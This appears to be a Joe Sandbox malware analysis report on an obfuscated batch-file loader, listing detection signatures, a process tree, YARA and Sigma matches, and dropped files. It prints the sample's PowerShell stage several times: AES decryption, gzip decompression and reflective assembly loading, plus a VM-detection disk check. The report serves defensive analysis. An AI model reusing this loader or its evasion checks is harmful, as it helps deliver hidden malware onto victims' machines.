Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NhoqAfkhHL.bat

Overview

General Information

Sample name:NhoqAfkhHL.bat
renamed because original name is a hash value
Original sample name:c62dff3f1b1b032ddb7e089b6e56cfcd27082d62a9627dec4ec8f2423175b750.bat
Analysis ID:1571318
MD5:98f30844747b3b14f19b6127df1765dc
SHA1:2441d2660c67e64784c729732553779b952a8296
SHA256:c62dff3f1b1b032ddb7e089b6e56cfcd27082d62a9627dec4ec8f2423175b750
Tags:batcapacity-sg-gl-at-ply-gguser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
.NET source code references suspicious native API functions
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found large BAT file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 2452 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NhoqAfkhHL.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 3160 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 3716 cmdline: findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 1988 cmdline: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Users\user\Desktop\NhoqAfkhHL.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 6548 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • dllhost.exe (PID: 5068 cmdline: C:\Windows\System32\dllhost.exe /Processid:{a30b26c3-fc52-4130-ba13-513d17912584} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
        • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
          • dllhost.exe (PID: 4668 cmdline: C:\Windows\System32\dllhost.exe /Processid:{239b6a72-1bca-4ef7-9072-2b3f0dd0b0f5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
            • svchost.exe (PID: 1944 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 1952 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2024 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • spoolsv.exe (PID: 2096 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)
            • svchost.exe (PID: 2188 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
            • svchost.exe (PID: 2204 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
          • svchost.exe (PID: 2440 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 924 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
        • svchost.exe (PID: 444 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 732 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1032 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1056 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1068 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1148 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1188 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1232 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1324 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1384 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1416 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1424 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1460 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1612 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1660 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1688 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1700 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1820 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1836 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1936 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • cmd.exe (PID: 1276 cmdline: "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\NhoqAfkhHL.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2820 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5292 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • findstr.exe (PID: 6348 cmdline: findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 5908 cmdline: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 5008 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • schtasks.exe (PID: 3868 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 5008INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x4257e:$b2: ::FromBase64String(
  • 0x425dc:$b2: ::FromBase64String(
  • 0xb1f62:$b2: ::FromBase64String(
  • 0xb2933:$b2: ::FromBase64String(
  • 0xd0e77:$b2: ::FromBase64String(
  • 0x22ec6:$s1: -join
  • 0x237a2:$s1: -join
  • 0x3c950:$s1: -join
  • 0x7d9a:$s3: Reverse
  • 0x41842:$s3: Reverse
  • 0x1ee76:$s4: +=
  • 0x1ee95:$s4: +=
  • 0x1eed0:$s4: +=
  • 0x1eeed:$s4: +=
  • 0x1ef28:$s4: +=
  • 0x1ef94:$s4: +=
  • 0x1f020:$s4: +=
  • 0x1f12e:$s4: +=
  • 0x20da8:$s4: +=
  • 0x20dcb:$s4: +=
  • 0x24a5c:$s4: +=

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Users\user\Desktop\NhoqAfkhHL.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] ('')); , CommandLine: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5008, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 3868, ProcessName: schtasks.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Users\user\Desktop\NhoqAfkhHL.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] ('')); , CommandLine: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5008, TargetFilename: C:\Windows\$nya-onimai2\qVrKPA.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{a30b26c3-fc52-4130-ba13-513d17912584}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 5068, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 924, ProcessName: svchost.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NhoqAfkhHL.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2452, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 6548, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.1% probability
Source: C:\Windows\$nya-onimai2\qVrKPA.exeJoe Sandbox ML: detected
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.3523139455.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
